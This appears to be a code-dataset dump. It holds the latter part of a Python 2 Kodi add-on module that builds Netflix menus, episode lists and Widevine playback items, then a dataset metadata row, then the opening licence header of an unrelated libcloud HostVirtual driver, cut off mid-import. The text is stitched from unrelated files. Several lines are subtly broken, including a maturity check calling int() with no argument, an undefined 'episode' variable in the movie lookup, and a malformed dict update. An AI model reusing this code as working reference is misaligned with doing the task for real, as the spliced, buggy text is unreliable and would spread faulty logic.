preselected_list_item = idx if item else None
preselected_list_item = idx + 1 if self.get_main_menu_selection() == 'search' else preselected_list_item
if preselected_list_item is not None:
xbmc.executebuiltin('ActivateWindowAndFocus(%s, %s)' % (str(xbmcgui.Window(xbmcgui.getCurrentWindowId()).getFocusId()), str(preselected_list_item)))
if not widget_display:
self.set_custom_view(VIEW_FOLDER)
return True
def build_video_listing(self, video_list, actions, type, build_url,
has_more=False, start=0, current_video_list_id="",
widget_display=False):
"""
Builds the video lists (my list, continue watching, etc.)
contents Kodi screen
Parameters
----------
video_list_ids : :obj:`dict` of :obj:`str`
List of video lists
actions : :obj:`dict` of :obj:`str`
Dictionary of actions to build subsequent routes
type : :obj:`str`
None or 'queue' f.e. when it´s a special video lists
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
List could be build
"""
view = VIEW_FOLDER
content = CONTENT_FOLDER
listItems = list()
for video_list_id in video_list:
video = video_list[video_list_id]
li = xbmcgui.ListItem(
label=video['title'],
iconImage=self.default_fanart)
# add some art to the item
li.setArt(self._generate_art_info(entry=video))
# add list item info
infos = self._generate_listitem_info(entry=video, li=li)
self._generate_context_menu_items(entry=video, li=li)
# lists can be mixed with shows & movies, therefor we need to check if its a movie, so play it right away
if video['type'] == 'movie':
# it´s a movie, so we need no subfolder & a route to play it
isFolder = False
maturity = video.get('maturity', {}).get('level', 999)
needs_pin = (True, False)[int() >= 100]
url = build_url({
'action': 'play_video',
'video_id': video_list_id,
'infoLabels': infos,
'pin': needs_pin})
view = VIEW_MOVIE
content = CONTENT_MOVIE
else:
# it´s a show, so we need a subfolder & route (for seasons)
isFolder = True
params = {
'action': actions[video['type']],
'show_id': video_list_id
}
params['pin'] = (True, False)[int(video.get('maturity', {}).get('level', 1001)) >= 1000]
if 'tvshowtitle' in infos:
title = infos.get('tvshowtitle', '').encode('utf-8')
params['tvshowtitle'] = base64.urlsafe_b64encode(title)
url = build_url(params)
view = VIEW_SHOW
content = CONTENT_SHOW
listItems.append((url, li, isFolder))
if has_more:
li_more = xbmcgui.ListItem(label=self.get_local_string(30045))
more_url = build_url({
"action": "video_list",
"type": type,
"start": str(start),
"video_list_id": current_video_list_id})
listItems.append((more_url, li_more, True))
xbmcplugin.addDirectoryItems(self.plugin_handle, listItems, len(listItems))
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_UNSORTED)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_TITLE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_GENRE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LASTPLAYED)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=content)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(view)
return True
def build_video_listing_exported(self, content, build_url, widget_display=False):
"""Build list of exported movies / shows
Parameters
----------
content : :obj:`dict` of :obj:`str`
List of video lists
Returns
-------
bool
List could be build
"""
action = ['remove_from_library', self.get_local_string(30030), 'remove']
li = xbmcgui.ListItem(
label=self.get_local_string(30064),
iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=build_url({'action': 'export-new-episodes','inbackground': True}),
listitem=li,
isFolder=False)
listing = content
for video in listing[0]:
year = self.library.get_exported_movie_year(title=video)
li = xbmcgui.ListItem(
label=str(video)+' ('+str(year)+')',
iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
isFolder = False
url = build_url({
'action': 'removeexported',
'title': str(video),
'year': str(year),
'type': 'movie'})
art = {}
image = self.library.get_previewimage(video)
art.update({
'landscape': image,
'thumb': image
})
li.setArt(art)
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=isFolder)
for video in listing[2]:
li = xbmcgui.ListItem(
label=str(video),
iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
isFolder = False
year = '0000'
url = build_url({
'action': 'removeexported',
'title': str(str(video)),
'year': str(year),
'type': 'show'})
art = {}
image = self.library.get_previewimage(video)
art.update({
'landscape': image,
'thumb': image
})
li.setArt(art)
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=isFolder)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_UNSORTED)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_TITLE)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_EXPORTED)
return True
def build_search_result_folder(self, build_url, term, widget_display=False):
"""Add search result folder
Parameters
----------
build_url : :obj:`fn`
Function to build the subsequent routes
term : :obj:`str`
Search term
Returns
-------
:obj:`str`
Search result folder URL
"""
# add search result as subfolder
li_rec = xbmcgui.ListItem(
label='({})'.format(term),
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': 'search_result', 'term': term})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_UNSORTED)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_FOLDER)
return url_rec
def set_location(self, url, replace=False):
"""Set URL location
Parameters
----------
url : :obj:`str`
Window URL
ret : bool
Return to location prior to activation
Returns
-------
bool
Window was activated
"""
cmd = 'Container.Update({},{})'.format(url, str(replace))
return xbmc.executebuiltin(cmd)
def build_search_result_listing(self, video_list, actions, build_url):
"""Builds the search results list Kodi screen
Parameters
----------
video_list : :obj:`dict` of :obj:`str`
List of videos or shows
actions : :obj:`dict` of :obj:`str`
Dictionary of actions to build subsequent routes
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
List could be build
"""
video_listing = self.build_video_listing(
video_list=video_list,
actions=actions,
type='search',
build_url=build_url)
return video_listing
def build_no_seasons_available(self):
"""Builds the season list screen if no seasons could be found
Returns
-------
bool
List could be build
"""
self.dialogs.show_no_seasons_notify()
xbmcplugin.endOfDirectory(self.plugin_handle)
return True
def build_no_search_results_available(self, build_url, action):
"""Builds the search results screen if no matches could be found
Parameters
----------
action : :obj:`str`
Action paramter to build the subsequent routes
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
List could be build
"""
self.dialogs.show_no_search_results_notify()
return xbmcplugin.endOfDirectory(self.plugin_handle)
def build_user_sub_listing(self, video_list_ids, type, action, build_url,
widget_display=False):
"""
Builds the video lists screen for user subfolders
(genres & recommendations)
Parameters
----------
video_list_ids : :obj:`dict` of :obj:`str`
List of video lists
type : :obj:`str`
List type (genre or recommendation)
action : :obj:`str`
Action paramter to build the subsequent routes
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
List could be build
"""
for video_list_id in video_list_ids:
li = xbmcgui.ListItem(
label=video_list_ids[video_list_id]['displayName'],
iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
url = build_url({'action': action, 'video_list_id': video_list_id})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_FOLDER)
return True
def build_season_listing(self, seasons_sorted, build_url, widget_display=False):
"""Builds the season list screen for a show
Parameters
----------
seasons_sorted : :obj:`list` of :obj:`dict` of :obj:`str`
Sorted list of season entries
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
List could be build
"""
for season in seasons_sorted:
li = xbmcgui.ListItem(label=season['text'])
# add some art to the item
li.setArt(self._generate_art_info(entry=season))
# add list item info
infos = self._generate_listitem_info(
entry=season,
li=li,
base_info={'mediatype': 'season'})
self._generate_context_menu_items(entry=season, li=li)
params = {'action': 'episode_list', 'season_id': season['id']}
if 'tvshowtitle' in infos:
title = infos.get('tvshowtitle', '').encode('utf-8')
params['tvshowtitle'] = base64.urlsafe_b64encode(title)
url = build_url(params)
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_NONE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LASTPLAYED)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_TITLE)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_SEASON)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_SEASON)
return True
def build_episode_listing(self, episodes_sorted, build_url, widget_display=False):
"""Builds the episode list screen for a season of a show
Parameters
----------
episodes_sorted : :obj:`list` of :obj:`dict` of :obj:`str`
Sorted list of episode entries
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
List could be build
"""
for episode in episodes_sorted:
li = xbmcgui.ListItem(label=episode['title'])
# add some art to the item
li.setArt(self._generate_art_info(entry=episode))
# add list item info
infos = self._generate_listitem_info(
entry=episode,
li=li,
base_info={'mediatype': 'episode'})
self._generate_context_menu_items(entry=episode, li=li)
maturity = episode.get('maturity', {}).get('maturityLevel', 999)
needs_pin = (True, False)[int(maturity) >= 100]
url = build_url({
'action': 'play_video',
'video_id': episode['id'],
'start_offset': episode['bookmark'],
'infoLabels': infos,
'pin': needs_pin})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=li,
isFolder=False)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_EPISODE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_NONE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LASTPLAYED)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_TITLE)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_DURATION)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_EPISODE)
xbmcplugin.endOfDirectory(self.plugin_handle)
if not widget_display:
self.set_custom_view(VIEW_EPISODE)
return True
def play_item(self, video_id, start_offset=-1, infoLabels={}, tvshow_video_id=None, timeline_markers={}):
"""Plays a video
Parameters
----------
video_id : :obj:`str`
ID of the video that should be played
start_offset : :obj:`str`
Offset to resume playback from (in seconds)
infoLabels : :obj:`str`
the listitem's infoLabels
Returns
-------
bool
List could be build
"""
is_helper = inputstreamhelper.Helper('mpd', drm='widevine')
if not is_helper.check_inputstream():
return False
# track play event
self.track_event('playVideo')
# inputstream addon properties
port = str(self.nx_common.get_setting('msl_service_port'))
msl_service_url = 'http://localhost:' + port
msl_manifest_url = msl_service_url + '/manifest?id=' + video_id
msl_manifest_url += '&dolby=' + self.nx_common.get_setting('enable_dolby_sound')
msl_manifest_url += '&hevc=' + self.nx_common.get_setting('enable_hevc_profiles')
msl_manifest_url += '&hdr=' + self.nx_common.get_setting('enable_hdr_profiles')
msl_manifest_url += '&dolbyvision=' + self.nx_common.get_setting('enable_dolbyvision_profiles')
msl_manifest_url += '&vp9=' + self.nx_common.get_setting('enable_vp9_profiles')
play_item = xbmcgui.ListItem(path=msl_manifest_url)
play_item.setContentLookup(False)
play_item.setMimeType('application/dash+xml')
play_item.setProperty(
key=is_helper.inputstream_addon + '.stream_headers',
value='user-agent=' + get_user_agent())
play_item.setProperty(
key=is_helper.inputstream_addon + '.license_type',
value='com.widevine.alpha')
play_item.setProperty(
key=is_helper.inputstream_addon + '.manifest_type',
value='mpd')
play_item.setProperty(
key=is_helper.inputstream_addon + '.license_key',
value=msl_service_url + '/license?id=' + video_id + '||b{SSM}!b{SID}|')
play_item.setProperty(
key=is_helper.inputstream_addon + '.server_certificate',
value='Cr0CCAMSEOVEukALwQ8307Y2+LVP+0MYh/HPkwUijgIwggEKAoIBAQDm875btoWUbGqQD8eAGuBlGY+Pxo8YF1LQR+Ex0pDONMet8EHslcZRBKNQ/09RZFTP0vrYimyYiBmk9GG+S0wB3CRITgweNE15cD33MQYyS3zpBd4z+sCJam2+jj1ZA4uijE2dxGC+gRBRnw9WoPyw7D8RuhGSJ95OEtzg3Ho+mEsxuE5xg9LM4+Zuro/9msz2bFgJUjQUVHo5j+k4qLWu4ObugFmc9DLIAohL58UR5k0XnvizulOHbMMxdzna9lwTw/4SALadEV/CZXBmswUtBgATDKNqjXwokohncpdsWSauH6vfS6FXwizQoZJ9TdjSGC60rUB2t+aYDm74cIuxAgMBAAE6EHRlc3QubmV0ZmxpeC5jb20SgAOE0y8yWw2Win6M2/bw7+aqVuQPwzS/YG5ySYvwCGQd0Dltr3hpik98WijUODUr6PxMn1ZYXOLo3eED6xYGM7Riza8XskRdCfF8xjj7L7/THPbixyn4mULsttSmWFhexzXnSeKqQHuoKmerqu0nu39iW3pcxDV/K7E6aaSr5ID0SCi7KRcL9BCUCz1g9c43sNj46BhMCWJSm0mx1XFDcoKZWhpj5FAgU4Q4e6f+S8eX39nf6D6SJRb4ap7Znzn7preIvmS93xWjm75I6UBVQGo6pn4qWNCgLYlGGCQCUm5tg566j+/g5jvYZkTJvbiZFwtjMW5njbSRwB3W4CrKoyxw4qsJNSaZRTKAvSjTKdqVDXV/U5HK7SaBA6iJ981/aforXbd2vZlRXO/2S+Maa2mHULzsD+S5l4/YGpSt7PnkCe25F+nAovtl/ogZgjMeEdFyd/9YMYjOS4krYmwp3yJ7m9ZzYCQ6I8RQN4x/yLlHG5RH/+WNLNUs6JAZ0fFdCmw=')
play_item.setProperty(
key='inputstreamaddon',
value=is_helper.inputstream_addon)
# check if we have a bookmark e.g. start offset position
if int(start_offset) > 0:
play_item.setProperty('StartOffset', str(start_offset) + '.0')
# set infoLabels
if len(infoLabels) > 0:
play_item.setInfo('video', infoLabels)
if len(infoLabels) == 0:
infoLabels = self.library.read_metadata_file(video_id=video_id)
art = self.library.read_artdata_file(video_id=video_id)
play_item.setArt(art)
play_item.setInfo('video', infoLabels)
signal_data = {'timeline_markers': timeline_markers}
if tvshow_video_id is not None:
signal_data.update({'tvshow_video_id': tvshow_video_id})
# check for content in kodi db
if str(infoLabels) != 'None':
if infoLabels['mediatype'] == 'episode':
id = self.showtitle_to_id(title=infoLabels['tvshowtitle'])
details = self.get_show_content_by_id(
showid=id,
showseason=infoLabels['season'],
showepisode=infoLabels['episode'])
else:
id = self.movietitle_to_id(title=infoLabels['title'])
details = self.get_movie_content_by_id(movieid=id)
if details is not False:
if 'resume' in details[0]:
resume_point = details[0].pop('resume')
play_item.setProperty(
'StartOffset', str(resume_point))
play_item.setInfo('video', details[0])
play_item.setArt(details[1])
signal_data.update({
'dbinfo': {
'dbid': details[0]['dbid'],
'dbtype': details[0]['mediatype'],
'playcount': details[0]['playcount']}})
if infoLabels['mediatype'] == 'episode':
signal_data['dbinfo'].update({'tvshowid': id[0]})
AddonSignals.sendSignal(Signals.PLAYBACK_INITIATED, signal_data)
return xbmcplugin.setResolvedUrl(
handle=self.plugin_handle,
succeeded=True,
listitem=play_item)
def _generate_art_info(self, entry):
"""Adds the art info from an entry to a Kodi list item
Parameters
----------
entry : :obj:`dict` of :obj:`str`
Entry that art dict should be generated for
Returns
-------
:obj:`dict` of :obj:`str`
Dictionary containing art info
"""
art = {'fanart': self.default_fanart}
# Cleanup art
art.update({
'landscape': '',
'thumb': '',
'fanart': '',
'poster': '',
'clearlogo': ''
})
if 'boxarts' in dict(entry).keys() and not isinstance(entry.get('boxarts'), dict):
big = entry.get('boxarts', '')
small = big
poster = big
if 'boxarts' in dict(entry).keys() and isinstance(entry.get('boxarts'), dict):
big = entry.get('boxarts', {}).get('big')
small = entry.get('boxarts', {}).get('small')
poster = entry.get('boxarts', {}).get('poster')
art.update({
'poster': poster,
'landscape': big or small,
'thumb': big or small,
'fanart': big or small
})
# Download image for exported listing
if 'title' in entry:
self.library.download_image_file(
title=entry['title'].encode('utf-8'),
url=str(big))
if 'interesting_moment' in dict(entry).keys():
if entry.get('type') == 'episode':
art.update({'thumb': entry['interesting_moment'],
'landscape': entry['interesting_moment']})
art.update({
'fanart': entry['interesting_moment']
})
if 'artwork' in dict(entry).keys():
art.update({
'fanart': entry['artwork']
})
if 'clearlogo' in dict(entry).keys():
art.update({'clearlogo': entry['clearlogo']})
if 'thumb' in dict(entry).keys():
art.update({'thumb': entry['thumb']})
if 'fanart' in dict(entry).keys():
art.update({'fanart': entry['fanart']})
if 'poster' in dict(entry).keys():
art.update({'poster': entry['poster']})
vid_id = entry.get('id', entry.get('summary', {}).get('id'))
self.library.write_artdata_file(video_id=str(vid_id), content=art)
return art
def _generate_listitem_info(self, entry, li, base_info={}):
infos, li_infos = self._generate_entry_info(entry, base_info)
li.setInfo('video', infos)
if li_infos.get('is_playable'):
li.setProperty('IsPlayable', 'true')
if 'quality' in li_infos:
li.addStreamInfo('video', li_infos['quality'])
return infos
def _generate_entry_info(self, entry, base_info):
"""Adds the item info from an entry to a Kodi list item
Parameters
----------
entry : :obj:`dict` of :obj:`str`
Entry that info dict should be generated for
base_info : :obj:`dict` of :obj:`str`
Additional info that overrules the entry info
Returns
-------
:obj:`dict` of :obj:`str`
Dictionary containing info labels
"""
infos = base_info
li_infos = {}
entry_keys = entry.keys()
# Cleanup item info
infos.update({
'writer': '',
'director': '',
'genre': '',
'mpaa': '',
'rating': '',
'plot': '',
'duration': '',
'season': '',
'title': '',
'tvshowtitle': '',
'mediatype': 'movie',
'playcount': '',
'episode': '',
'year': ''
})
if 'cast' in entry_keys and len(entry['cast']) > 0:
infos.update({'cast': entry['cast']})
if 'creators' in entry_keys and len(entry['creators']) > 0:
infos.update({'writer': entry['creators'][0]})
if 'directors' in entry_keys and len(entry['directors']) > 0:
infos.update({'director': entry['directors'][0]})
if 'genres' in entry_keys and len(entry['genres']) > 0:
infos.update({'genre': entry['genres'][0]})
if 'maturity' in entry_keys:
if 'mpaa' in entry_keys:
infos.update({'mpaa': entry['mpaa']})
else:
if entry.get('maturity', None) is not None:
if entry.get('maturity', {}).get('board') is not None and entry.get('maturity', {}).get('value') is not None:
infos.update({'mpaa': str(entry['maturity']['board'].encode('utf-8')) + '-' + str(entry['maturity']['value'].encode('utf-8'))})
if 'rating' in entry_keys:
infos.update({'rating': int(entry['rating']) * 2})
if 'synopsis' in entry_keys:
infos.update({'plot': entry['synopsis']})
if 'plot' in entry_keys:
infos.update({'plot': entry['plot']})
if 'runtime' in entry_keys:
infos.update({'duration': entry['runtime']})
if 'duration' in entry_keys:
infos.update({'duration': entry['duration']})
if 'seasons_label' in entry_keys:
infos.update({'season': entry['seasons_label']})
if 'season' in entry_keys:
infos.update({'season': entry['season']})
if 'title' in entry_keys:
infos.update({'title': entry['title']})
if 'type' in entry_keys:
if entry['type'] == 'movie' or entry['type'] == 'episode':
li_infos['is_playable'] = True
elif entry['type'] == 'show':
infos.update({'tvshowtitle': entry['title']})
if 'mediatype' in entry_keys:
if (entry['mediatype'] == 'movie' or
entry['mediatype'] == 'episode'):
li_infos['is_playable'] = True
infos.update({'mediatype': entry['mediatype']})
if 'watched' in entry_keys and entry.get('watched') is True:
infos.update({'playcount': 1})
else:
del infos['playcount']
if 'index' in entry_keys:
infos.update({'episode': entry['index']})
if 'episode' in entry_keys:
infos.update({'episode': entry['episode']})
if 'year' in entry_keys:
infos.update({'year': entry['year']})
if 'quality' in entry_keys:
quality = {'width': '960', 'height': '540'}
if entry['quality'] == '720':
quality = {'width': '1280', 'height': '720'}
if entry['quality'] == '1080':
quality = {'width': '1920', 'height': '1080'}
li_infos['quality'] = quality
if 'tvshowtitle' in entry_keys:
title = entry.get('tvshowtitle', '')
if not isinstance(title, unicode):
title = base64.urlsafe_b64decode(title).decode('utf-8')
infos.update({'tvshowtitle': title})
self.library.write_metadata_file(
video_id=str(entry['id']), content=infos)
return infos, li_infos
def _generate_context_menu_items(self, entry, li):
"""Adds context menue items to a Kodi list item
Parameters
----------
entry : :obj:`dict` of :obj:`str`
Entry that should be turned into a list item
li : :obj:`XMBC.ListItem`
Kodi list item instance
Returns
-------
:obj:`XMBC.ListItem`
Kodi list item instance
"""
items = []
action = {}
entry_keys = entry.keys()
# action item templates
encoded_title = urlencode({'title': entry['title'].encode('utf-8')}) if 'title' in entry else ''
url_tmpl = 'XBMC.RunPlugin(' + self.base_url + '?action=%action%&id=' + str(entry['id']) + '&' + encoded_title + ')'
if not self._context_menu_actions:
self._context_menu_actions = [
['export_to_library', self.get_local_string(30018), 'export'],
['remove_from_library', self.get_local_string(30030), 'remove'],
['update_the_library', self.get_local_string(30061), 'update'],
['rate_on_netflix', self.get_local_string(30019), 'rating'],
['remove_from_my_list', self.get_local_string(30020), 'remove_from_list'],
['add_to_my_list', self.get_local_string(30021), 'add_to_list']
]
# build concrete action items
for action_item in self._context_menu_actions:
action.update({action_item[0]: [action_item[1], url_tmpl.replace('%action%', action_item[2])]})
# add or remove the movie/show/season/episode from & to the users "My List"
if 'in_my_list' in entry_keys:
items.append(action['remove_from_my_list']) if entry['in_my_list'] else items.append(action['add_to_my_list'])
elif 'queue' in entry_keys:
items.append(action['remove_from_my_list']) if entry['queue'] else items.append(action['add_to_my_list'])
elif 'my_list' in entry_keys:
items.append(action['remove_from_my_list']) if entry['my_list'] else items.append(action['add_to_my_list'])
# rate the movie/show/season/episode on Netflix
items.append(action['rate_on_netflix'])
# add possibility to export this movie/show/season/episode to a static/local library (and to remove it)
if 'type' in entry_keys:
# add/remove movie
if entry['type'] == 'movie':
action_type = 'remove_from_library' if self.library.movie_exists(title=entry['title'], year=entry.get('year', 0000)) else 'export_to_library'
items.append(action[action_type])
# Add update option
if action_type == 'remove_from_library':
action_type = 'update_the_library'
items.append(action[action_type])
if entry['type'] == 'show' and 'title' in entry_keys:
action_type = 'remove_from_library' if self.library.show_exists(title=entry['title']) else 'export_to_library'
items.append(action[action_type])
# Add update option
if action_type == 'remove_from_library':
action_type = 'update_the_library'
items.append(action[action_type])
# add it to the item
li.addContextMenuItems(items)
#return li
def movietitle_to_id(self, title):
query = {
"jsonrpc": "2.0",
"method": "VideoLibrary.GetMovies",
"params": {
"properties": ["title"]
},
"id": "libMovies"
}
try:
rpc_result = xbmc.executeJSONRPC(
jsonrpccommand=json.dumps(query, encoding='utf-8'))
json_result = json.loads(rpc_result)
if 'result' in json_result and 'movies' in json_result['result']:
json_result = json_result['result']['movies']
for movie in json_result:
# Switch to ascii/lowercase and remove special chars and spaces
# to make sure best possible compare is possible
titledb = movie['title'].encode('ascii', 'ignore')
titledb = re.sub(r'[?|$|!|:|#|\.|\,|\'| ]', r'', titledb).lower().replace('-', '')
if '(' in titledb:
titledb = titledb.split('(')[0]
titlegiven = title.encode('ascii','ignore')
titlegiven = re.sub(r'[?|$|!|:|#|\.|\,|\'| ]', r'', titlegiven).lower().replace('-', '')
if '(' in titlegiven:
titlegiven = titlegiven.split('(')[0]
if titledb == titlegiven:
return movie['movieid']
return '-1'
except Exception:
return '-1'
def showtitle_to_id(self, title):
query = {
"jsonrpc": "2.0",
"method": "VideoLibrary.GetTVShows",
"params": {
"properties": ["title", "genre"]
},
"id": "libTvShows"
}
try:
rpc_result = xbmc.executeJSONRPC(
jsonrpccommand=json.dumps(query, encoding='utf-8'))
json_result = json.loads(rpc_result)
if 'result' in json_result and 'tvshows' in json_result['result']:
json_result = json_result['result']['tvshows']
for tvshow in json_result:
# Switch to ascii/lowercase and
# remove special chars and spaces
# to make sure best possible compare is possible
titledb = tvshow['label'].encode('ascii', 'ignore')
titledb = re.sub(
pattern=r'[?|$|!|:|#|\.|\,|\'| ]',
repl=r'',
string=titledb).lower().replace('-', '')
if '(' in titledb:
titledb = titledb.split('(')[0]
titlegiven = title.encode('ascii', 'ignore')
titlegiven = re.sub(
pattern=r'[?|$|!|:|#|\.|\,|\'| ]',
repl=r'',
string=titlegiven).lower().replace('-', '')
if '(' in titlegiven:
titlegiven = titlegiven.split('(')[0]
if titledb == titlegiven:
return tvshow['tvshowid'], tvshow['genre']
return '-1', ''
except Exception:
return '-1', ''
def get_show_content_by_id(self, showid, showseason, showepisode):
showseason = int(showseason)
showepisode = int(showepisode)
props = ["title", "showtitle", "season", "episode", "plot", "fanart",
"art", "resume", "playcount"]
query = {
"jsonrpc": "2.0",
"method": "VideoLibrary.GetEpisodes",
"params": {
"properties": props,
"tvshowid": int(showid[0])
},
"id": "1"
}
try:
rpc_result = xbmc.executeJSONRPC(
jsonrpccommand=json.dumps(query, encoding='utf-8'))
json_result = json.loads(rpc_result)
result = json_result.get('result', None)
if result is not None and 'episodes' in result:
result = result['episodes']
for episode in result:
in_season = episode['season'] == showseason
in_episode = episode['episode'] == showepisode
if in_season and in_episode:
infos = {'mediatype': 'episode',
'dbid': episode['episodeid'],
'tvshowtitle': episode['showtitle'],
'title': episode['title']}
if episode['resume']['position'] > 0:
infos['resume'] = episode['resume']['position']
infos.update({'playcount': episode.get('playcount', 0),
'plot': episode['plot'],
'genre': showid[1]}
if episode.get('plot') else {})
art = {}
art.update({'fanart': episode['fanart']}
if episode.get('fanart') else {})
if 'art' in episode:
_update_if_present(source_dict=episode['art'],
source_att='thumb',
target_dict=art,
target_att='thumb')
_update_if_present(source_dict=episode['art'],
source_att='tvshow.poster',
target_dict=art,
target_att='poster')
_update_if_present(source_dict=episode['art'],
source_att='tvshow.banner',
target_dict=art,
target_att='banner')
return infos, art
return False
except Exception:
return False
def get_movie_content_by_id(self, movieid):
query = {
"jsonrpc": "2.0",
"method": "VideoLibrary.GetMovieDetails",
"params": {
"movieid": movieid,
"properties": [
"title",
"genre",
"plot",
"fanart",
"thumbnail",
"art",
"resume",
"playcount"]
},
"id": "libMovies"
}
try:
rpc_result = xbmc.executeJSONRPC(
jsonrpccommand=json.dumps(query, encoding='utf-8'))
json_result = json.loads(rpc_result)
result = json_result.get('result', None)
if result is not None and 'moviedetails' in result:
result = result.get('moviedetails', {})
infos = {'mediatype': 'movie', 'dbid': movieid,
'title': result['title'],
'playcount': episode.get('playcount', 0)}
if 'resume' in result:
infos.update('resume', result['resume'])
if 'genre' in result and len(result['genre']) > 0:
infos.update({'genre': json_result['genre']})
if 'plot' in result and len(result['plot']) > 0:
infos.update({'plot': result['plot']})
art = {}
if 'fanart' in result and len(result['fanart']) > 0:
art.update({'fanart': result['fanart']})
if 'thumbnail' in result and len(result['thumbnail']) > 0:
art.update({'thumb': result['thumbnail']})
if 'art' in json_result and len(result['art']['poster']) > 0:
art.update({'poster': result['art']['poster']})
return infos, art
return False
except Exception:
return False
def get_local_string(self, string_id):
"""Returns the localized version of a string
Parameters
----------
string_id : :obj:`int`
ID of the string that shoudl be fetched
Returns
-------
:obj:`str`
Requested string or empty string
"""
src = xbmc if string_id < 30000 else self.nx_common.get_addon()
locString = src.getLocalizedString(string_id)
if isinstance(locString, unicode):
locString = locString.encode('utf-8')
return locString
def track_event(self, event):
"""
Send a tracking event if tracking is enabled
:param event: the string idetifier of the event
:return: None
"""
# Check if tracking is enabled
enable_tracking = (self.nx_common.get_setting('enable_tracking') == 'true')
if enable_tracking:
# Get or Create Tracking id
tracking_id = self.nx_common.get_setting('tracking_id')
if tracking_id is '':
tracking_id = str(uuid4())
self.nx_common.set_setting('tracking_id', tracking_id)
# Send the tracking event
tracker = Tracker.create('UA-46081640-5', client_id=tracking_id)
tracker.send('event', event)
| gpl-2.0 | -867,985,303,682,476,900 | 38.27705 | 965 | 0.535646 | false |
SecurityCompass/libcloud | libcloud/compute/drivers/hostvirtual.py | 18 | 13880 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
libcloud driver for the Host Virtual Inc. (VR) API
Home page https://www.hostvirtual.com/
"""
import time
import re
try:
import simplejson as json
except ImportError:
